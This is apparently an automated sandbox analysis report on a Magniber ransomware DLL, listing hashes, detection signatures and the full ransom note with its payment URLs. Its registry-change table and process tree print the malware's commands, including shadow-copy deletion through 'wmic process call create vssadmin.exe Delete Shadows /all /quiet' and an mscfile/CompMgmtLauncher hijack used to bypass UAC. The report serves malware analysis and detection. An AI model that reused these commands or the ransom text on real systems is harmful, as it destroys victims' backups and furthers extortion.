magniber | 06acd697bc0a41a6fa1098eba46ddd40d029a5fef3eb152fbf9d0d39e6f8673d

Analysis

max time kernel
121s
max time network
124s
platform
windows7_x64
resource
win7-20231025-en
resource tags

arch:x64arch:x86image:win7-20231025-enlocale:en-usos:windows7-x64system
submitted
01-12-2023 08:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

06acd697bc0a41a6fa1098eba46ddd40d029a5fef3eb152fbf9d0d39e6f8673d.dll
Size

38KB
MD5

96d505aa061f15eff5b723ae3f82bc98
SHA1

fadec5f3bd444044ec269334cfb1ee9fff41da12
SHA256

06acd697bc0a41a6fa1098eba46ddd40d029a5fef3eb152fbf9d0d39e6f8673d
SHA512

925fdeb3b7cdf337ac809cd2e35b8301020dd1c6f9da25754e2a0b762c2a4a187090777c97c26cd43fd93297f62b00c15593579eadd9cb72f187dc1793cf7ed0
SSDEEP

768:biAFh5YBIKGMZmJ1/VTrzDSXl+h6AbUMP02Q3NYVdQDVMM:bT2nZoVTrzDSjVMEvWM

Score

10^/10

magniber ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Pictures\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://5464fea07c8ca2c02gihmepi.7hibj3fp6jlp52q2m4lv6thx2lr34itaayiydby2axofaql54dung3ad.onion/gihmepi Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://5464fea07c8ca2c02gihmepi.hateme.uno/gihmepi http://5464fea07c8ca2c02gihmepi.oddson.quest/gihmepi http://5464fea07c8ca2c02gihmepi.dearbet.sbs/gihmepi http://5464fea07c8ca2c02gihmepi.legcore.space/gihmepi Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://5464fea07c8ca2c02gihmepi.7hibj3fp6jlp52q2m4lv6thx2lr34itaayiydby2axofaql54dung3ad.onion/gihmepi

http://5464fea07c8ca2c02gihmepi.hateme.uno/gihmepi

http://5464fea07c8ca2c02gihmepi.oddson.quest/gihmepi

http://5464fea07c8ca2c02gihmepi.dearbet.sbs/gihmepi

http://5464fea07c8ca2c02gihmepi.legcore.space/gihmepi

Signatures

Detect magniber ransomware 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2952-0-0x0000000001BF0000-0x0000000001E2E000-memory.dmp	family_magniber
behavioral1/memory/1072-16-0x0000000001B40000-0x0000000001B45000-memory.dmp	family_magniber

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber

Process spawned unexpected child process 12 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

vssadmin.exevssadmin.execmd.execmd.exevssadmin.exevssadmin.execmd.exevssadmin.exevssadmin.exevssadmin.execmd.exevssadmin.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2644	1876	vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1948	1876	vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2652	1876	cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2792	1876	cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2748	1876	vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2420	1876	vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2336	1876	cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1660	1876	vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	868	1876	vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1032	1876	vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1028	1876	cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1924	1876	vssadmin.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Renames multiple (57) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Suspicious use of SetThreadContext 4 IoCs

Processes:

rundll32.exe

description	pid	process	target process
PID 2952 set thread context of 1072	2952	rundll32.exe	taskhost.exe
PID 2952 set thread context of 1148	2952	rundll32.exe	Dwm.exe
PID 2952 set thread context of 1184	2952	rundll32.exe	Explorer.EXE
PID 2952 set thread context of 1728	2952	rundll32.exe	DllHost.exe

Interacts with shadow copies 2 TTPs 8 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid process

2420 vssadmin.exe
1660 vssadmin.exe
868 vssadmin.exe
1032 vssadmin.exe
1924 vssadmin.exe
2644 vssadmin.exe
1948 vssadmin.exe
2748 vssadmin.exe

pid	process
2420	vssadmin.exe
1660	vssadmin.exe
868	vssadmin.exe
1032	vssadmin.exe
1924	vssadmin.exe
2644	vssadmin.exe
1948	vssadmin.exe
2748	vssadmin.exe

Modifies Internet Explorer settings 1 TTPs 34 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXE

description	ioc	process
Set value (data)	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002e1e81ecbc95de49994f369c3e71718400000000020000000000106600000001000020000000468236b5dbf0e87a95282a3aef723eb1203cab95ab6a38daac20959571c0b807000000000e80000000020000200000008714037419ea0a44ec822f2c0da79e29d253b351cf75735c015898beda2fd006200000008d792e12b6fa53b0a6559e55cc8f3955966c8dfafd02a3614e2d16ea4665e444400000001cc7ed28396691432b78d732a7b1358d68a173bcc8b9b40120affbc7166f9cf35c1385278492c9789b9685410da7ee01391a99e8e1e500e9694c508d7fcb3ff5	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002e1e81ecbc95de49994f369c3e717184000000000200000000001066000000010000200000000eef20f17b406a13915ce152eb1df2b20c39592337ff98422871499cb85786c8000000000e800000000200002000000030ae6ee5d740feeb9408e9eea9eb5ebab0bb37f6e8777edc814a217418953ae4900000004074df3aa47b84d70de39e1feff76e4614b5fcfeae3ef148981210e037620ef1986891f2227b52e68c67914207535cc8c2b69869f9d37e96129be269f678fd2d4c5134b980eeee9d97d5180b7a0500b5ac53b2e8dc5a53c255dae5d0243331e3b9de93466db5a0b6546c954d5f8c174632a3145c308d1516720f1f6c9d1586329ee7c56b80505d54123c818e67b6a94840000000c025da21e012ae7f824137b209774c99cade1f1d4d7e59541fd4851b22a5b61ed025485a79366e7ea9dd73c4b18f82fc3041f4d3d67e92309acb9ec342536a76	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{D18BDAC1-9027-11EE-AA50-CEE1673409DD} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 5085e5a63424da01	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "407582986"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe

Modifies registry class 11 IoCs

Processes:

rundll32.exeDwm.exeExplorer.EXEtaskhost.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000_CLASSES\mscfile\shell\open\command	Dwm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000_CLASSES\mscfile	taskhost.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000_CLASSES\mscfile\shell	taskhost.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000_CLASSES\mscfile\shell\open	taskhost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	taskhost.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000_CLASSES\mscfile\shell\open\command	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000_CLASSES\mscfile\shell\open\command	taskhost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	Dwm.exe
Key created	\REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000_CLASSES\mscfile\shell\open\command	Explorer.EXE

Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

notepad.exe

pid process

2040 notepad.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

rundll32.exe

pid process

2952 rundll32.exe
2952 rundll32.exe
Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

1184 Explorer.EXE
Suspicious behavior: MapViewOfSection 4 IoCs

Processes:

rundll32.exe

pid process

2952 rundll32.exe
2952 rundll32.exe
2952 rundll32.exe
2952 rundll32.exe

pid	process
2040	notepad.exe

pid	process
2952	rundll32.exe
2952	rundll32.exe

pid	process
1184	Explorer.EXE

pid	process
2952	rundll32.exe
2952	rundll32.exe
2952	rundll32.exe
2952	rundll32.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Explorer.EXEwmic.exewmic.exeWMIC.exe

description	pid	process
Token: SeShutdownPrivilege	1184	Explorer.EXE
Token: SeShutdownPrivilege	1184	Explorer.EXE
Token: SeShutdownPrivilege	1184	Explorer.EXE
Token: SeShutdownPrivilege	1184	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	1428	wmic.exe
Token: SeSecurityPrivilege	1428	wmic.exe
Token: SeTakeOwnershipPrivilege	1428	wmic.exe
Token: SeLoadDriverPrivilege	1428	wmic.exe
Token: SeSystemProfilePrivilege	1428	wmic.exe
Token: SeSystemtimePrivilege	1428	wmic.exe
Token: SeProfSingleProcessPrivilege	1428	wmic.exe
Token: SeIncBasePriorityPrivilege	1428	wmic.exe
Token: SeCreatePagefilePrivilege	1428	wmic.exe
Token: SeBackupPrivilege	1428	wmic.exe
Token: SeRestorePrivilege	1428	wmic.exe
Token: SeShutdownPrivilege	1428	wmic.exe
Token: SeDebugPrivilege	1428	wmic.exe
Token: SeSystemEnvironmentPrivilege	1428	wmic.exe
Token: SeRemoteShutdownPrivilege	1428	wmic.exe
Token: SeUndockPrivilege	1428	wmic.exe
Token: SeManageVolumePrivilege	1428	wmic.exe
Token: 33	1428	wmic.exe
Token: 34	1428	wmic.exe
Token: 35	1428	wmic.exe
Token: SeShutdownPrivilege	1184	Explorer.EXE
Token: SeShutdownPrivilege	1184	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	2016	wmic.exe
Token: SeSecurityPrivilege	2016	wmic.exe
Token: SeTakeOwnershipPrivilege	2016	wmic.exe
Token: SeLoadDriverPrivilege	2016	wmic.exe
Token: SeSystemProfilePrivilege	2016	wmic.exe
Token: SeSystemtimePrivilege	2016	wmic.exe
Token: SeProfSingleProcessPrivilege	2016	wmic.exe
Token: SeIncBasePriorityPrivilege	2016	wmic.exe
Token: SeCreatePagefilePrivilege	2016	wmic.exe
Token: SeBackupPrivilege	2016	wmic.exe
Token: SeRestorePrivilege	2016	wmic.exe
Token: SeShutdownPrivilege	2016	wmic.exe
Token: SeDebugPrivilege	2016	wmic.exe
Token: SeSystemEnvironmentPrivilege	2016	wmic.exe
Token: SeRemoteShutdownPrivilege	2016	wmic.exe
Token: SeUndockPrivilege	2016	wmic.exe
Token: SeManageVolumePrivilege	2016	wmic.exe
Token: 33	2016	wmic.exe
Token: 34	2016	wmic.exe
Token: 35	2016	wmic.exe
Token: SeIncreaseQuotaPrivilege	1636	WMIC.exe
Token: SeSecurityPrivilege	1636	WMIC.exe
Token: SeTakeOwnershipPrivilege	1636	WMIC.exe
Token: SeLoadDriverPrivilege	1636	WMIC.exe
Token: SeSystemProfilePrivilege	1636	WMIC.exe
Token: SeSystemtimePrivilege	1636	WMIC.exe
Token: SeProfSingleProcessPrivilege	1636	WMIC.exe
Token: SeIncBasePriorityPrivilege	1636	WMIC.exe
Token: SeCreatePagefilePrivilege	1636	WMIC.exe
Token: SeBackupPrivilege	1636	WMIC.exe
Token: SeRestorePrivilege	1636	WMIC.exe
Token: SeShutdownPrivilege	1636	WMIC.exe
Token: SeDebugPrivilege	1636	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1636	WMIC.exe
Token: SeRemoteShutdownPrivilege	1636	WMIC.exe
Token: SeUndockPrivilege	1636	WMIC.exe
Token: SeManageVolumePrivilege	1636	WMIC.exe
Token: 33	1636	WMIC.exe

Suspicious use of FindShellTrayWindow 5 IoCs

Processes:

iexplore.exeExplorer.EXE

pid process

1276 iexplore.exe
1184 Explorer.EXE
1184 Explorer.EXE
1184 Explorer.EXE
1184 Explorer.EXE
Suspicious use of SendNotifyMessage 1 IoCs

Processes:

Explorer.EXE

pid process

1184 Explorer.EXE
Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

iexplore.exeIEXPLORE.EXE

pid process

1276 iexplore.exe
1276 iexplore.exe
2100 IEXPLORE.EXE
2100 IEXPLORE.EXE
2100 IEXPLORE.EXE
2100 IEXPLORE.EXE

pid	process
1276	iexplore.exe
1184	Explorer.EXE
1184	Explorer.EXE
1184	Explorer.EXE
1184	Explorer.EXE

pid	process
1184	Explorer.EXE

pid	process
1276	iexplore.exe
1276	iexplore.exe
2100	IEXPLORE.EXE
2100	IEXPLORE.EXE
2100	IEXPLORE.EXE
2100	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

taskhost.execmd.exerundll32.execmd.execmd.exeiexplore.execmd.execmd.exeCompMgmtLauncher.exeCompMgmtLauncher.exeDwm.execmd.execmd.exeCompMgmtLauncher.exeExplorer.EXE

description	pid	process	target process
PID 1072 wrote to memory of 2040	1072	taskhost.exe	notepad.exe
PID 1072 wrote to memory of 2040	1072	taskhost.exe	notepad.exe
PID 1072 wrote to memory of 2040	1072	taskhost.exe	notepad.exe
PID 1072 wrote to memory of 976	1072	taskhost.exe	cmd.exe
PID 1072 wrote to memory of 976	1072	taskhost.exe	cmd.exe
PID 1072 wrote to memory of 976	1072	taskhost.exe	cmd.exe
PID 1072 wrote to memory of 1428	1072	taskhost.exe	wmic.exe
PID 1072 wrote to memory of 1428	1072	taskhost.exe	wmic.exe
PID 1072 wrote to memory of 1428	1072	taskhost.exe	wmic.exe
PID 1072 wrote to memory of 572	1072	taskhost.exe	cmd.exe
PID 1072 wrote to memory of 572	1072	taskhost.exe	cmd.exe
PID 1072 wrote to memory of 572	1072	taskhost.exe	cmd.exe
PID 572 wrote to memory of 1636	572	cmd.exe	WMIC.exe
PID 572 wrote to memory of 1636	572	cmd.exe	WMIC.exe
PID 572 wrote to memory of 1636	572	cmd.exe	WMIC.exe
PID 2952 wrote to memory of 2016	2952	rundll32.exe	wmic.exe
PID 2952 wrote to memory of 2016	2952	rundll32.exe	wmic.exe
PID 2952 wrote to memory of 2016	2952	rundll32.exe	wmic.exe
PID 2952 wrote to memory of 1744	2952	rundll32.exe	cmd.exe
PID 2952 wrote to memory of 1744	2952	rundll32.exe	cmd.exe
PID 2952 wrote to memory of 1744	2952	rundll32.exe	cmd.exe
PID 1744 wrote to memory of 1160	1744	cmd.exe	WMIC.exe
PID 1744 wrote to memory of 1160	1744	cmd.exe	WMIC.exe
PID 1744 wrote to memory of 1160	1744	cmd.exe	WMIC.exe
PID 976 wrote to memory of 1276	976	cmd.exe	iexplore.exe
PID 976 wrote to memory of 1276	976	cmd.exe	iexplore.exe
PID 976 wrote to memory of 1276	976	cmd.exe	iexplore.exe
PID 1276 wrote to memory of 2100	1276	iexplore.exe	IEXPLORE.EXE
PID 1276 wrote to memory of 2100	1276	iexplore.exe	IEXPLORE.EXE
PID 1276 wrote to memory of 2100	1276	iexplore.exe	IEXPLORE.EXE
PID 1276 wrote to memory of 2100	1276	iexplore.exe	IEXPLORE.EXE
PID 2792 wrote to memory of 1992	2792	cmd.exe	CompMgmtLauncher.exe
PID 2792 wrote to memory of 1992	2792	cmd.exe	CompMgmtLauncher.exe
PID 2792 wrote to memory of 1992	2792	cmd.exe	CompMgmtLauncher.exe
PID 2652 wrote to memory of 2668	2652	cmd.exe	CompMgmtLauncher.exe
PID 2652 wrote to memory of 2668	2652	cmd.exe	CompMgmtLauncher.exe
PID 2652 wrote to memory of 2668	2652	cmd.exe	CompMgmtLauncher.exe
PID 1992 wrote to memory of 3060	1992	CompMgmtLauncher.exe	wmic.exe
PID 1992 wrote to memory of 3060	1992	CompMgmtLauncher.exe	wmic.exe
PID 1992 wrote to memory of 3060	1992	CompMgmtLauncher.exe	wmic.exe
PID 2668 wrote to memory of 2896	2668	CompMgmtLauncher.exe	wmic.exe
PID 2668 wrote to memory of 2896	2668	CompMgmtLauncher.exe	wmic.exe
PID 2668 wrote to memory of 2896	2668	CompMgmtLauncher.exe	wmic.exe
PID 1148 wrote to memory of 108	1148	Dwm.exe	wmic.exe
PID 1148 wrote to memory of 108	1148	Dwm.exe	wmic.exe
PID 1148 wrote to memory of 108	1148	Dwm.exe	wmic.exe
PID 1148 wrote to memory of 2972	1148	Dwm.exe	cmd.exe
PID 1148 wrote to memory of 2972	1148	Dwm.exe	cmd.exe
PID 1148 wrote to memory of 2972	1148	Dwm.exe	cmd.exe
PID 2972 wrote to memory of 2072	2972	cmd.exe	WMIC.exe
PID 2972 wrote to memory of 2072	2972	cmd.exe	WMIC.exe
PID 2972 wrote to memory of 2072	2972	cmd.exe	WMIC.exe
PID 2336 wrote to memory of 2172	2336	cmd.exe	CompMgmtLauncher.exe
PID 2336 wrote to memory of 2172	2336	cmd.exe	CompMgmtLauncher.exe
PID 2336 wrote to memory of 2172	2336	cmd.exe	CompMgmtLauncher.exe
PID 2172 wrote to memory of 2876	2172	CompMgmtLauncher.exe	wmic.exe
PID 2172 wrote to memory of 2876	2172	CompMgmtLauncher.exe	wmic.exe
PID 2172 wrote to memory of 2876	2172	CompMgmtLauncher.exe	wmic.exe
PID 1184 wrote to memory of 2080	1184	Explorer.EXE	wmic.exe
PID 1184 wrote to memory of 2080	1184	Explorer.EXE	wmic.exe
PID 1184 wrote to memory of 2080	1184	Explorer.EXE	wmic.exe
PID 1184 wrote to memory of 2160	1184	Explorer.EXE	cmd.exe
PID 1184 wrote to memory of 2160	1184	Explorer.EXE	cmd.exe
PID 1184 wrote to memory of 2160	1184	Explorer.EXE	cmd.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:1728

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1184
- C:\Windows\system32\rundll32.exe
  rundll32.exe C:\Users\Admin\AppData\Local\Temp\06acd697bc0a41a6fa1098eba46ddd40d029a5fef3eb152fbf9d0d39e6f8673d.dll,#1
  2⤵
  - Suspicious use of SetThreadContext
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:2952
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1744
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
      4⤵
      PID:1160
- - C:\Windows\system32\wbem\wmic.exe
    C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2016
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:2080
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  PID:2160
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    PID:2120

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1148
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:108
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2972
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    PID:2072

C:\Windows\system32\taskhost.exe
"taskhost.exe"
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1072
- C:\Windows\system32\notepad.exe
  notepad.exe C:\Users\Public\readme.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:2040
- C:\Windows\system32\cmd.exe
  cmd /c "start http://5464fea07c8ca2c02gihmepi.hateme.uno/gihmepi^&2^&42174196^&57^&305^&12"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:976
- - C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://5464fea07c8ca2c02gihmepi.hateme.uno/gihmepi&2&42174196&57&305&12
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1276
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1276 CREDAT:275457 /prefetch:2
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:2100
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1428
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:572
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1636

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2644

C:\Windows\system32\CompMgmtLauncher.exe
CompMgmtLauncher.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:1992
- C:\Windows\system32\wbem\wmic.exe
  "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
